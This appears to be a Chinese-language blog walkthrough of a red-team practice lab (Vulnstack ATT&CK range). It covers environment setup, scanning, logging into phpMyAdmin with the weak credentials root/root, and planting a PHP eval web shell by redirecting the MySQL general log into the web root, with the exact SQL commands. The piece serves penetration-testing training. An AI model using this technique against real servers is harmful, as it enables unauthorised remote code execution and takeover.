靶機練習 - ATT&CK紅隊實戰靶場 - 1. 環境搭建和漏洞利用
最近某個公眾號介紹了網上的一套環境,這個環境是多個Windows靶機組成的,涉及到內網滲透,正好Windows和內網滲透一直沒怎麼接觸過,所以拿來學習下。
下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
環境配置和檢查
加上kali一共四臺虛擬機器。
win7 x64
需要配置兩張網絡卡,一個在內網網段,一個在外網網段,配置如下(VM預設只有一張網絡卡,自己新增一個網路介面卡就好了),內網網路配置為特定虛擬網路:
兩臺內網伺服器,網路配置如下:
kali虛擬機器應只能連到外網,也就是和win7的外網網絡卡在同一網段,但無法訪問內網網段,網路配置如下:
啟動win7虛擬機器C盤下的phpstudy:
最後內網的三臺虛擬機器互相ping一下,保證能ping通。
資訊收集
kali掃一下ip,win7外網網址為:192.168.174.135:
對win7進行埠掃描:
80埠是一個網站,發現網站底部有一個MySQL資料庫連線檢測:
嘗試輸入使用者名稱和密碼root/root,連上了。。。就。。。挺突然的。。。
再對網站進行掃描,發現phpinifo.php和phpmyadmin頁面:
漏洞利用
第一步資訊收集找到了php後臺管理頁面以及mysql的root密碼,接下來嘗試利用這個漏洞getshell從而控制釋出網站的這臺主機。
訪問http://192.168.174.135/phpmyadmin/,並用弱密碼root/root登入,利用方式有兩種:
1. 利用into outfile直接寫入shell檔案
show variables like '%secure%'
很遺憾secure_file_priv的值是NULL,也就是不允許匯入匯出,如果嘗試寫入shell檔案會失敗:
2.利用日誌getshell
開啟mysql日誌功能:
show global variables like '%general%'
set global general_log='ON'
將日誌檔案的存放位置修改為當前網站的根目錄:
set global general_log_file = 'C:/phpStudy/WWW/shell.php'
執行語句:
SELECT '<?php @eval($_POST["cmd"]); ?>'
用蟻劍連線:
當前域名為god,登入使用者是admin:
&n